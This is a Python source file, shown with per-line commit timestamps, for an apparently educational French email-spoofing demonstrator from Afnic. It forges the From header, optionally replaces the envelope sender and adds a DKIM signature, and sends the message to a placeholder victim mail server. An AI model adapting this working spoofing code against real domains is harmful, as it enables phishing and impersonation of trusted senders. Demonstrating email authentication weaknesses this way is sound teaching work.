2023-10-25 15:50:21 +02:00
|
|
|
|
#!/usr/bin/env python3
|
2023-10-25 15:50:33 +02:00
|
|
|
|
#
|
|
|
|
|
# SPDX-FileCopyrightText: 2023 Afnic
|
|
|
|
|
#
|
|
|
|
|
# SPDX-License-Identifier: GPL-3.0-or-later
|
|
|
|
|
#
|
2023-10-25 15:50:21 +02:00
|
|
|
|
|
2023-10-25 15:50:24 +02:00
|
|
|
|
from argparse import ArgumentParser
|
2023-10-25 15:50:21 +02:00
|
|
|
|
from email.message import EmailMessage
|
|
|
|
|
import email.utils
|
|
|
|
|
import importlib.resources
|
2023-10-25 15:50:24 +02:00
|
|
|
|
import json
|
2023-10-25 15:50:21 +02:00
|
|
|
|
import pathlib
|
|
|
|
|
import re
|
|
|
|
|
import smtplib
|
|
|
|
|
import sys
|
|
|
|
|
import uuid
|
|
|
|
|
|
|
|
|
|
import dkim
|
|
|
|
|
from rich.console import Console
|
|
|
|
|
import rich.highlighter
|
|
|
|
|
import rich.panel
|
|
|
|
|
from rich.prompt import Confirm, Prompt
|
|
|
|
|
import rich.text
|
|
|
|
|
from rich.theme import Theme
|
|
|
|
|
|
|
|
|
|
import spoof_templates
|
|
|
|
|
|
|
|
|
|
DEFAULT_HELO = "attaquant.example"
|
|
|
|
|
ATTACKER_DOMAIN = "attaquant.example"
|
|
|
|
|
ATTACKER_MAIL_FROM = "usurpateur@attaquant.example"
|
|
|
|
|
VICTIM_NAME = "Destinataire"
|
|
|
|
|
VICTIM_DOMAIN = "destinataire.example"
|
|
|
|
|
VICTIM_MX = "mx.destinataire.example"
|
|
|
|
|
VICTIM_ADDRESS = f"destinataire@{VICTIM_DOMAIN}"
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class SMTPHighlighter(rich.highlighter.Highlighter):
|
|
|
|
|
patterns = {
|
|
|
|
|
'helo': r'(?:HELO|EHLO) (?P<helo>.*)',
|
|
|
|
|
'mail_from': r'MAIL FROM:<(?P<mail_from>.*?)>',
|
|
|
|
|
'rcpt_to': r'RCPT TO:<(?P<rcpt_to>.*)>',
|
|
|
|
|
'data': r'From: (?P<data_display_name>.* <(?P<data_from>.*)>)'
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
def __init__(self, **kwargs):
|
|
|
|
|
super().__init__(**kwargs)
|
|
|
|
|
self.state = 'connect'
|
|
|
|
|
|
|
|
|
|
def highlight(self, text):
|
|
|
|
|
if pattern := SMTPHighlighter.patterns.get(self.state, None):
|
|
|
|
|
if mobj := re.match(pattern, text.plain):
|
|
|
|
|
for style in mobj.groupdict().keys():
|
|
|
|
|
start, end = mobj.start(style), mobj.end(style)
|
|
|
|
|
text.stylize(style, start, end)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
custom_theme = Theme({
|
|
|
|
|
"banner": "bold red",
|
|
|
|
|
"incoming": "yellow",
|
|
|
|
|
"outgoing": "cyan",
|
|
|
|
|
"helo": "bold sea_green1",
|
|
|
|
|
"mail_from": "bold underline sky_blue1",
|
|
|
|
|
"rcpt_to": "bold underline pale_violet_red1",
|
|
|
|
|
"data_from": "bold underline medium_purple1",
|
|
|
|
|
"data_display_name": "medium_purple1",
|
|
|
|
|
"comment": "#777777",
|
|
|
|
|
"failure": "bold red",
|
2023-10-25 15:50:24 +02:00
|
|
|
|
"success": "green",
|
|
|
|
|
"text": "default"
|
2023-10-25 15:50:21 +02:00
|
|
|
|
})
|
|
|
|
|
console = Console(highlighter=None, theme=custom_theme)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class SMTP(smtplib.SMTP):
|
2023-10-25 15:50:24 +02:00
|
|
|
|
def __init__(self, output, **kwargs):
|
2023-10-25 15:50:21 +02:00
|
|
|
|
super().__init__(**kwargs)
|
|
|
|
|
self.highlighter = SMTPHighlighter()
|
2023-10-25 15:50:24 +02:00
|
|
|
|
self.log = [];
|
|
|
|
|
self.output = output
|
2023-10-25 15:50:21 +02:00
|
|
|
|
|
|
|
|
|
def trace(self, s, direction):
|
|
|
|
|
if direction not in ['in', 'out']:
|
|
|
|
|
raise ValueError("direction must be 'in' or 'out'")
|
|
|
|
|
|
|
|
|
|
arrows = {'in': '[incoming]←[/]', 'out': '[outgoing]→[/]'}
|
|
|
|
|
max_lines = 4
|
|
|
|
|
|
|
|
|
|
if isinstance(s, bytes):
|
|
|
|
|
s = s.decode('utf-8')
|
2023-10-25 15:50:24 +02:00
|
|
|
|
|
|
|
|
|
lines = [{'class': 'text', 'text': text} for text in s.splitlines()]
|
|
|
|
|
|
|
|
|
|
# lines = [self.highlighter(rich.text.Text(line)) for line in s.splitlines()]
|
2023-10-25 15:50:21 +02:00
|
|
|
|
if len(lines) > max_lines:
|
|
|
|
|
suppressed_count = len(lines[max_lines:-1])
|
|
|
|
|
if suppressed_count > 1:
|
2023-10-25 15:50:24 +02:00
|
|
|
|
suppressed_text = f"{suppressed_count} lignes omises"
|
2023-10-25 15:50:21 +02:00
|
|
|
|
else:
|
2023-10-25 15:50:24 +02:00
|
|
|
|
suppressed_text = f"{suppressed_count} ligne omise"
|
|
|
|
|
suppressed_obj = {'class': 'comment', 'text': suppressed_text}
|
2023-10-25 15:50:21 +02:00
|
|
|
|
|
2023-10-25 15:50:24 +02:00
|
|
|
|
lines = lines[:max_lines] + [suppressed_obj] + lines[-1:]
|
2023-10-25 15:50:21 +02:00
|
|
|
|
|
2023-10-25 15:50:24 +02:00
|
|
|
|
# Print the text on the console
|
|
|
|
|
if self.output:
|
|
|
|
|
for i, l in enumerate(lines):
|
|
|
|
|
prefix = arrows[direction] if i == 0 else " "
|
|
|
|
|
console.print(f" {prefix} ", end=None)
|
|
|
|
|
console.print(l['text'], style=l['class'])
|
2023-10-25 15:50:21 +02:00
|
|
|
|
|
2023-10-25 15:50:24 +02:00
|
|
|
|
if direction == 'in':
|
|
|
|
|
console.print()
|
|
|
|
|
|
|
|
|
|
# Save it internally too
|
|
|
|
|
self.log.append({'direction': direction, 'lines': lines})
|
2023-10-25 15:50:21 +02:00
|
|
|
|
|
|
|
|
|
def putcmd(self, cmd, args=''):
|
|
|
|
|
super().putcmd(cmd.upper(), args)
|
|
|
|
|
|
|
|
|
|
def send(self, s):
|
|
|
|
|
self.trace(s, 'out')
|
|
|
|
|
super().send(s)
|
|
|
|
|
|
|
|
|
|
def getreply(self):
|
|
|
|
|
errcode, errmsg = super().getreply()
|
|
|
|
|
lines = errmsg.decode('us-ascii').splitlines()
|
|
|
|
|
lines = [
|
|
|
|
|
f"{errcode}{' ' if i == len(lines) - 1 else '-'}{line}"
|
|
|
|
|
for i, line in enumerate(lines)
|
|
|
|
|
]
|
|
|
|
|
self.trace('\n'.join(lines), 'in')
|
|
|
|
|
return errcode, errmsg
|
|
|
|
|
|
|
|
|
|
def connect(self, *args, **kwargs):
|
2023-10-25 15:50:24 +02:00
|
|
|
|
self.log.append({'direction': 'comment',
|
|
|
|
|
'lines': [{'class': 'comment',
|
|
|
|
|
'text': 'Connexion établie au serveur'}]})
|
2023-10-25 15:50:21 +02:00
|
|
|
|
return super().connect(*args, **kwargs)
|
|
|
|
|
|
|
|
|
|
def ehlo(self, *args, **kwargs):
|
|
|
|
|
self.highlighter.state = 'helo'
|
|
|
|
|
return super().ehlo(*args, **kwargs)
|
|
|
|
|
|
|
|
|
|
def mail(self, *args, **kwargs):
|
|
|
|
|
self.highlighter.state = 'mail_from'
|
|
|
|
|
return super().mail(*args, **kwargs)
|
|
|
|
|
|
|
|
|
|
def rcpt(self, *args, **kwargs):
|
|
|
|
|
self.highlighter.state = 'rcpt_to'
|
|
|
|
|
return super().rcpt(*args, **kwargs)
|
|
|
|
|
|
|
|
|
|
def data(self, *args):
|
|
|
|
|
self.highlighter.state = 'data'
|
|
|
|
|
return super().data(*args)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def ask_helo():
|
|
|
|
|
response = Prompt.ask("Nom d’hôte dans le [helo]HELO[/helo]",
|
|
|
|
|
console=console,
|
|
|
|
|
default=DEFAULT_HELO)
|
|
|
|
|
return response
|
|
|
|
|
|
|
|
|
|
def ask_mail_from(default_mail_from):
|
|
|
|
|
console.print("Adresse RFC5321.MailFrom :")
|
|
|
|
|
console.print(f" 1. Utiliser le même que le RFC5322.From ([b]{default_mail_from}[/])")
|
|
|
|
|
console.print(f" 2. Remplacer par une adresse qu’on maîtrise ([b]{ATTACKER_MAIL_FROM}[/])")
|
|
|
|
|
console.print()
|
|
|
|
|
choices = {
|
|
|
|
|
1: default_mail_from,
|
|
|
|
|
2: ATTACKER_MAIL_FROM
|
|
|
|
|
}
|
|
|
|
|
while True:
|
|
|
|
|
try:
|
|
|
|
|
response = Prompt.ask("Choix", console=console)
|
|
|
|
|
result = choices[int(response)]
|
|
|
|
|
console.print(f" ⇒ [mail_from]{result}[/]")
|
|
|
|
|
return result
|
|
|
|
|
except ValueError:
|
|
|
|
|
pass
|
|
|
|
|
except IndexError:
|
|
|
|
|
pass
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def add_dkim_signature(email):
|
|
|
|
|
if Confirm.ask("Ajouter une signature DKIM ?", choices="on", default=False):
|
|
|
|
|
email_bytes = email.as_string().encode('utf-8')
|
|
|
|
|
selector = Prompt.ask("Sélecteur")
|
|
|
|
|
private_key = pathlib.Path(f"{selector}.private").read_bytes()
|
|
|
|
|
selector = selector.encode('ascii')
|
|
|
|
|
domain = Prompt.ask("Domaine", default=ATTACKER_DOMAIN).encode('ascii')
|
|
|
|
|
signature_line = dkim.dkim_sign(email_bytes, selector, domain, private_key).decode('ascii')
|
|
|
|
|
signature = re.match("^DKIM-Signature: (.*)\r\n", signature_line, re.DOTALL).group(1)
|
|
|
|
|
console.print(" ⇒ Signature DKIM ajoutée")
|
|
|
|
|
email['DKIM-Signature'] = signature
|
|
|
|
|
else:
|
|
|
|
|
console.print(" ⇒ Pas de signature DKIM")
|
|
|
|
|
|
|
|
|
|
return email
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def generate_email(template):
|
|
|
|
|
msg = template.msg
|
|
|
|
|
msg['To'] = f"{VICTIM_NAME} <{VICTIM_ADDRESS}>"
|
|
|
|
|
msg['Date'] = email.utils.formatdate()
|
|
|
|
|
msg['Message-ID'] = f"{uuid.uuid4()}@{DEFAULT_HELO}"
|
|
|
|
|
if not msg['Content-Type']:
|
|
|
|
|
msg['Content-Type'] = "text/plain; charset=utf-8"
|
|
|
|
|
|
|
|
|
|
return msg
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def ask_template():
|
|
|
|
|
templates = spoof_templates.spoof_templates()
|
|
|
|
|
console.print("[bold]Sélectionner un scénario :[/]")
|
|
|
|
|
for i, template in enumerate(templates):
|
|
|
|
|
console.print(f"{i + 1:4}. {template.nice_name}")
|
|
|
|
|
console.print()
|
|
|
|
|
|
|
|
|
|
while True:
|
|
|
|
|
try:
|
|
|
|
|
response = Prompt.ask("Choix")
|
|
|
|
|
result = templates[int(response) - 1]
|
|
|
|
|
console.print(f" ⇒ [bold]{result.nice_name}[/]")
|
|
|
|
|
console.print()
|
|
|
|
|
return result
|
|
|
|
|
except ValueError:
|
|
|
|
|
pass
|
|
|
|
|
except IndexError:
|
|
|
|
|
pass
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
2023-10-25 15:50:24 +02:00
|
|
|
|
def send_email(helo, envelope_from, email, output=True):
|
2023-10-25 15:50:21 +02:00
|
|
|
|
data = email.as_string().encode('utf-8')
|
2023-10-25 15:50:24 +02:00
|
|
|
|
with SMTP(local_hostname=helo, output=output) as smtp:
|
|
|
|
|
try:
|
2023-10-25 15:50:21 +02:00
|
|
|
|
smtp.connect(VICTIM_MX)
|
|
|
|
|
smtp.sendmail(envelope_from, VICTIM_ADDRESS, data)
|
2023-10-25 15:50:24 +02:00
|
|
|
|
return {'outcome': 'success', 'log': smtp.log}
|
|
|
|
|
except smtplib.SMTPException:
|
|
|
|
|
return {'outcome': 'failure', 'log': smtp.log}
|
|
|
|
|
except:
|
|
|
|
|
raise
|
2023-10-25 15:50:21 +02:00
|
|
|
|
|
|
|
|
|
|
2023-10-25 15:50:24 +02:00
|
|
|
|
def interactive_main():
|
2023-10-25 15:50:21 +02:00
|
|
|
|
try:
|
|
|
|
|
console.print(
|
|
|
|
|
rich.panel.Panel(
|
|
|
|
|
"🕱 Outil d’usurpation d’identité de courriel 🕱",
|
|
|
|
|
style="banner",
|
|
|
|
|
width=80))
|
|
|
|
|
console.print()
|
|
|
|
|
|
|
|
|
|
template = ask_template()
|
|
|
|
|
display_name, rfc5322from = re.match('(.*) <(.*)>', template.msg['From']).groups()
|
|
|
|
|
console.print(f"Adresse RFC5322.From (tirée du scénario):")
|
|
|
|
|
console.print(f" ⇒ [data_display_name]{display_name} <[data_from]{rfc5322from}[/data_from]>[/]")
|
|
|
|
|
console.print()
|
|
|
|
|
|
|
|
|
|
envelope_from = ask_mail_from(rfc5322from)
|
|
|
|
|
console.print()
|
|
|
|
|
|
|
|
|
|
helo = ask_helo()
|
|
|
|
|
console.print()
|
|
|
|
|
|
|
|
|
|
email = generate_email(template)
|
|
|
|
|
signed_email = add_dkim_signature(email)
|
|
|
|
|
|
2023-10-25 15:50:24 +02:00
|
|
|
|
results = send_email(helo, envelope_from, signed_email, output=True)
|
|
|
|
|
if results['outcome'] == 'success':
|
|
|
|
|
console.print(" [success]✔[/] Message [success]accepté[/] par le serveur SMTP")
|
|
|
|
|
elif results['outcome'] == 'failure':
|
|
|
|
|
console.print(" [failure]✘[/] Message [failure]rejeté[/] par le serveur SMTP")
|
|
|
|
|
|
2023-10-25 15:50:21 +02:00
|
|
|
|
except KeyboardInterrupt:
|
|
|
|
|
console.print()
|
|
|
|
|
pass
|
|
|
|
|
except:
|
|
|
|
|
raise
|
|
|
|
|
|
|
|
|
|
|
2023-10-25 15:50:24 +02:00
|
|
|
|
|
|
|
|
|
def main():
|
|
|
|
|
parser = ArgumentParser()
|
|
|
|
|
parser.add_argument('--non-interactive', default=False, action='store_true')
|
|
|
|
|
parser.add_argument('--get-config', default=False, action='store_true')
|
|
|
|
|
parser.add_argument('--template')
|
|
|
|
|
parser.add_argument('--replace-rfc5321-mail-from', default=False, action='store_true')
|
|
|
|
|
parser.add_argument('--helo', default=DEFAULT_HELO)
|
|
|
|
|
|
|
|
|
|
args = parser.parse_args()
|
|
|
|
|
|
|
|
|
|
if args.non_interactive:
|
|
|
|
|
if args.get_config:
|
|
|
|
|
config = {
|
|
|
|
|
'default_helo': DEFAULT_HELO,
|
|
|
|
|
'my_mail_from': ATTACKER_MAIL_FROM,
|
|
|
|
|
'templates': [{'id': t.name,
|
|
|
|
|
'name': t.nice_name,
|
|
|
|
|
'from_name': re.match('(.*) <(.*)>', t.msg['From']).group(1),
|
|
|
|
|
'from_address': re.match('(.*) <(.*)>', t.msg['From']).group(2)}
|
|
|
|
|
for t in spoof_templates.spoof_templates()]
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
print(json.dumps(config))
|
|
|
|
|
else:
|
|
|
|
|
templates = {t.name: t for t in spoof_templates.spoof_templates()}
|
|
|
|
|
template = templates[args.template]
|
|
|
|
|
rfc5322from, = re.match('.* <(.*)>', template.msg['From']).groups()
|
|
|
|
|
if args.replace_rfc5321_mail_from:
|
|
|
|
|
envelope_from = ATTACKER_MAIL_FROM
|
|
|
|
|
else:
|
|
|
|
|
envelope_from = rfc5322from
|
|
|
|
|
|
|
|
|
|
email = generate_email(template)
|
|
|
|
|
results = send_email(args.helo, envelope_from, email, output=False)
|
|
|
|
|
print(json.dumps(results))
|
|
|
|
|
else:
|
|
|
|
|
interactive_main()
|
|
|
|
|
|
2023-10-25 15:50:21 +02:00
|
|
|
|
if __name__ == '__main__':
|
|
|
|
|
main()
|